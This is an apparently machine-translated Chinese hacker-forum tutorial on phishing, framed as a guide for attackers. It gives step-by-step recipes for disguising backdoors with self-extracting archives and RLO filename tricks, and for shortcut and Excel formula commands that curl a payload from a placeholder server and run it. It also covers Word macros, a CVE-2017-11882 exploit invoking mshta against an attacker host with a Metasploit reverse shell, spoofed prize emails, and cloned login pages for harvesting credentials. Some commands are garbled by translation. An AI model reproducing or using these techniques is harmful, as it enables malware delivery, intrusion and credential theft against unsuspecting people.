跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

一文就学会网络钓鱼“骚”姿势

精选回复

发布于

## 1. 什么是网络钓鱼?

网络钓鱼是一种攻击,通过冒充银行或其他信誉良好的机构向他人发送垃圾邮件,目的是诱骗收件人泄露用户名、密码、帐户ID、ATM PIN 或信用卡详细信息等敏感信息。

## 2. 网络钓鱼的基本流程

钓鱼一般分为三个步骤:找大鱼、做饵、抛竿

寻找大鱼:我们的目标一般包括:HR、销售、文员等安全意识薄弱的人员,以及运维、开发等拥有重要资源的人员。

制作鱼饵:优质的鱼饵一般分为两部分。一是邮件内容更加真实可信,二是邮件附件尽可能伪装得正常。

抛竿:最后把鱼竿抛出去后,就可以等待鱼儿上钩了。

## 3.如何制作优质鱼饵

###0x01.自解压+RLO

制作思路:利用自解压文件的特性,解压后自动执行解压后的文件,达到上线的目的。由于自解压文件的后缀是exe,很容易被识破,所以我们还需要使用RLO后缀反转来进行一些伪装。

第一步:使用cs生成windows后门085b0a9ce967d80b9cf8d4fbdf66720d.png

第二步:准备任意图片,使用WinRAR将后门和图片一起自解压c3661a26e61c54308d9ddd5daeaf37ca.png

压缩文件时,需要在高级——自解压选项中进行一些设置,使木马的执行更加隐蔽:

常规——解压路径:C:\\windows\\temp

设置——解压运行:C:\\windows\\temp\\artifact.exe

C:\\windows\\temp\\wallpaper.jpg

模式—— 全部隐藏

更新—— 更新模式—— 解压缩并更新文件

更新—— 覆盖模式—— 覆盖所有文件ebe08c44522789f7c4439cfceeed9797.png

ba6a1b0eb83d48c81ff3ec50cb28c20a.png

第三步:使用resourcehacker更改文件图标,伪装成图片68e4193bf68449252311f486a8516bca.png

第四步:将文件重命名为wallpaper gpj.exe,然后使用RLO反转后缀。最终效果如下14a4127dc124f25211199582c3f92072.png

结合电子邮件钓鱼等方式向他人发送“图片”,引诱他人上钩

对方双击“图片”后,会同时执行artifact.exe和wallpaper.jpg,cs 15caf233ef6f37b0356953d0c9a3e9bb.png上线。

###0x02.快捷方式

制作思路:运行快捷方式时,执行命令让它下载我们提前放置在服务器上的后门程序并运行

第一步:在cs中生成后门,放置在服务器网站目录085b0a9ce967d80b9cf8d4fbdf66720d.png

步骤2:创建快捷方式并在目标中写入以下代码

````

C:\\Windows\\System32\\cmd.exe /kcurl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\\Windows\\temp\\win.exe C:\\Windows\\temp\\win.exe

``fe992b5710db1044fb1815090b8d9180.png

步骤3:更改图标以增加其真实性f56ef3418438e29e0df1b913c37808f0.png

bb3445dc919e2572bae20810d5964d7a.png

当对方双击快捷键时,就会下载并执行我们准备的artifact.exe 15caf233ef6f37b0356953d0c9a3e9bb.png

###0x03.Word宏病毒

宏病毒是嵌入在Word 中的带有恶意行为的宏代码(VBA 代码)。当我们双击打开含有宏病毒的word文档时,其宏代码就会自动运行。

第一步:使用cs生成恶意vba代码2a273220a0c6890ffa8fecfe46b99b20.png

685f57e18bb1f3da35ce7cd8a78e8889.png

第二步:新建doc文档,创建宏,保存93375c575389c3ad51d5b5d13b3a2f2a.png

第三步:再次打开文件后,会提示是否启用宏。点击启用,cs 27dce4fd11814e1e861a3639814de852.png 即可上线。

15caf233ef6f37b0356953d0c9a3e9bb.png

###0x04.Excel注入

Excel注入是一种将包含恶意命令的Excel公式插入到可导出为csv或xls等格式的文本中的方法。当用excel打开xls文件时,该文件会转换为excel格式,并提供excel公式的执行功能,从而引起命令执行。

####使用excel注入弹出计算器

注入代码:`=cmd| '/c 计算'! '!A1'` c17d037d6ab921e104c7896d4706b955.png

4b7abb75e935f5e27f0876130a27d370.png

####使用excel注入在线cs

第一步:使用cs生成exe后门放到服务器145a8a261f0cd7a2bda64ba524db4aa2.png

第二步:替换恶意代码

````

=命令| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --输出C:\\Windows\\temp\\win.exe C:\\Windows\\temp\\win.exe' ! 'A1'

``1ce8be6f5d2073605860d153828431d8.png

双击excel打开时,会执行恶意代码下载cs后门并运行,在线cs 15caf233ef6f37b0356953d0c9a3e9bb.png

###0x05.CVE-2017-11882

CVE-2017-11882漏洞也是一种文字钓鱼方式。它比宏病毒更加隐蔽。 Word伪装成某个通知文件,目标点击后可以直接上网。

使用CVE-2017-11882弹出计算器:

下载poc:https://github.com/Rider/CVE-2017-11882

生成带病毒的word文件

````

python2 Command109b_CVE-2017-11882.py -c \'cmd.exe /c calc.exe\' -o test.doc

``c57a1da34ce677d8e17d12a52503537a.png

双击test.doc,弹出计算器0f8d636a3ee20c8f9f80502a2b86509f.png

使用cve-2017-11882上线msf

步骤1:使用exploit/windows/misc/hta_server生成病毒

````

使用exploit/windows/misc/hta_server

设置有效负载windows/meterpreter/reverse_http

设置端口4444

显示选项

剥削

``c3f8c398925c29e3c3966e9f5d33184c.png

第二步:生成含有病毒的doc文件,并将其伪装成通知文件

````

python2 Command109b_CVE-2017-11882.py -c \'mshta http://192.168.126.132:8080/Uf7DGFz.hta\' -o notification file.doc -i input.rtf

``4cb24bc20be9de185a63900ec1f41c7a.png

当受害者打开word时,msf会上线shell 840e19c0f07dd51cb131f8b08597c412.png

## 4. 电子邮件伪造

**斯瓦克斯**

Swaks是kali自带的一个电子邮件伪造工具。通过swak,您可以将包含任何内容的电子邮件发送到任何目标。

````

swak 的用法:

--来自发件人的电子邮件地址

--ehlo 虚假电子邮件标头

--body 电子邮件正文内容

--header 邮件标题信息,subject 为邮件标题

--数据源电子邮件

--附加附件文件

````

发送电子邮件至指定的电子邮件地址

````

swaks --to [email protected] --来自A公司--ehlo 获奖须知--body 秉承“以诚信为人、精益求精”的企业核心价值观,立足发展,真正回馈社会和客户。全体员工祝贺您荣获本次活动一等奖。再次感谢您对我公司的信任和支持。这封信只是中奖的证明。具体细节请参见注释。 --header \'Subject: 获奖通知\'

``ffadfccea12db4ca52441af944693d7c.png

3ddc542289489a0f94d8260a1eeb974c.png

如今,邮箱具有某种检测机制。如果你想让别人发邮件,这个方法就不是很有效。

**戈菲什**

Gophish是一个开源的钓鱼工具包,拥有自己的网页面板,给电子邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来了极大的便利。

伪造中奖通知邮件并发送附件e42c84ec7cbe9e4d7830ab3f59fc661a.png

看起来效果不错。如果能保护文件不被杀掉就更好了。56a821d0ab977740b57a63c944885f64.png

第二种方法是将克隆的网站b5b66883e9fa06afc1b0f541fed7d622.png插入电子邮件正文中。

然后克隆一个QQ邮箱的登录页面,诱导其输入账号密码1bc78cb7c9183e17334acd977622fb82.png

1e09e46fec907b4ff137698c88869cd6.png

如果对方提交账户密码,会显示在gophish f8181bbce7c5dc20a517cd06590e9a6f.png

## 5. 网站克隆

###0x01,设置工具包

说到克隆网站,Kali自带的setoolkit为我们提供了很大的便利。它不仅可以记录用户提交的数据,还可以进行注入攻击。

### settoolkit 克隆网站

1.启动setoolkit,选择1,社会工程攻击

````

1)社会工程攻击【社会工程攻击(常用)】

2)渗透测试(快速通道)【渗透测试(快速通道)】

3) 第三方模块【第三方模块】

4) 更新社会工程工具包【更新社会工程工具包】

5) 更新SET配置【升级配置】

6) 帮助、制作人员和关于【帮助】

``c7422ceb4f96edff693302a086efa656.png

2.然后选择2、web网站攻击-钓鱼

````

1)鱼叉式网络钓鱼攻击媒介【鱼叉式网络钓鱼攻击】

2)网站攻击向量【Web网站攻击-钓鱼(常用)】

3) 传染性媒体生成器【传染性木马】

4) 创建Payload和Listener【创建Payload和Listener】

5) 群发邮件攻击【群发邮件攻击】

6)基于Arduino的攻击向量[基于Android的攻击]

7) 无线接入点攻击向量【wifi攻击】

8)QRCode Generator Attack Vector【生成QR码(只是普通QR码)】

9) Powershell攻击向量【Powershell攻击】

10) 第三方模块【第三方模块】

``4d0118c1a27ca6dc9806728855de4773.png

3.选项3,凭证攻击

````

1)Java Applet攻击方法【java Applet攻击】

2)Metasploit浏览器利用方法【Metasploit浏览器利用】

3)凭证收割机攻击方法【凭证攻击(常用)】

4) Tabnabbing攻击方法【Tababbing攻击】

5)Web劫持攻击方式【网页劫持】

6) Multi-Attack Web Method【web多重攻击】

7)HTA攻击方式【HTA攻击】

``635c25a5056ce7d2ef974699308498ac.png

4.最后选择2、网站克隆

````

1) 网页模板【网页模板】

2) 网站克隆【克隆网站】

3) 定制进口【定制进口】

````

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。